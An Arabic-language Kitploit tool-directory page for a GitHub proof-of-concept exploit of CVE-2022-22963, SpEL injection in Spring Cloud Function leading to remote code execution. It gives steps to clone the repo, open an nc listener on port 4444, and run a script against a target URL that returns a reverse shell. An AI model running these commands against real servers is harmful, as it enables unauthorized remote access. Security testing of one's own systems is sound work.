Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-22963 — استغلال لإثبات المفهوم لـ CVE-2022-22963، وهو حقن SpEL في Spring Cloud Function يؤدي إلى تنفيذ تعليمات برمجية عن بُعد. يتضمن سكريبت شل للاستغلال الآلي مع حمولة شل عكسي. | Kitploit
أدوات/GitHubGitHub/jrbh4ck/cve-2022-22963
الاستغلالشيل كوداستغلال تطبيقات الويبالتعلم والتعليمأداة الوصول عن بعد
GitHubjrbh4ck/cve-2022-22963

CVE-2022-22963

استغلال لإثبات المفهوم لـ CVE-2022-22963، وهو حقن SpEL في Spring Cloud Function يؤدي إلى تنفيذ تعليمات برمجية عن بُعد. يتضمن سكريبت شل للاستغلال الآلي مع حمولة شل عكسي.

عرض المستودع
12منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-22963

في الإصدارات 3.1.6 و 3.2.2 والإصدارات السابقة من Spring Cloud Function، عند استخدام وظيفة التوجيه، من الممكن أن يقدم المستخدم تعبير SpEL مصمم خصيصًا كتعبير توجيه قد يؤدي إلى تنفيذ بعيد للكود والوصول إلى الموارد المحلية.

PoC

استنساخ المستودع

root@kitploit:~
git clone https://github.com/jrbH4CK/CVE-2022-22963.git

ادخل إلى المجلد

root@kitploit:~
cd CVE-2022-22963

تغيير أذونات التنفيذ

root@kitploit:~
chmode +x springCloud.sh

ابدأ nc على المنفذ المطلوب

root@kitploit:~
nc -nlvp 4444

قم بتنفيذ الأمر التالي مع تغيير المعاملات حسب احتياجاتك

root@kitploit:~
./springCloud.sh url lhost lport

ملاحظة: استخدام هذا المستودع هو مسؤولية المستخدم وليس المؤلف، للأغراض التعليمية فقط.

تنزيل الأداة